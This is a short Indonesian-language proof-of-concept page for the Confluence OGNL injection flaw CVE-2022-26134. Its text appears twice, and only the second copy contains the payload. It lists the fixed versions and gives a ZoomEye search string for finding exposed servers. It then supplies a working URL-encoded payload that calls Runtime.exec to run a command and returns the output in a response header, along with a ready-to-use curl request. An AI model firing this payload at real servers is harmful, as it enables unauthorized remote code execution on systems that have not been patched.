Remote Code Execution (RCE) vulnerability pada Atlassian Confluence.
CVE: CVE-2022-26134
Vendor: Atlassian
Fixed Versions: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1
Zoomeye search: "<meta name=\"ajs-version-number\" content=\"version\">"
Proof of Concept:
Buat request dengan payload
Kita mengeksekusi command id dengan membuat header X-Naxtarrr-D704T. Untuk melihat hasil dari command yang sudah dieksekusi bisa dilihat pada bagian header.
Contoh request dengan curl
*Parameter --head untuk mendapatkan header nya saja, dan parameter --insecure untuk skip ssl verification
Bisa dilihat pada bagian X-Naxtarrr-D704T, command id sudah berhasil tereksekusi.
CVE: CVE-2022-26134
Vendor: Atlassian
Fixed Versions: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1
Zoomeye search: "<meta name=\"ajs-version-number\" content=\"version\">"
Proof of Concept:
Buat request dengan payload
/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Naxtarrr-D704T%22%2C%23a%29%29%7D/
Kita mengeksekusi command id dengan membuat header X-Naxtarrr-D704T. Untuk melihat hasil dari command yang sudah dieksekusi bisa dilihat pada bagian header.
Contoh request dengan curl
curl --head --insecure "https://localhost/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Naxtarrr-D704T%22%2C%23a%29%29%7D/"
*Parameter --head untuk mendapatkan header nya saja, dan parameter --insecure untuk skip ssl verification
Bisa dilihat pada bagian X-Naxtarrr-D704T, command id sudah berhasil tereksekusi.


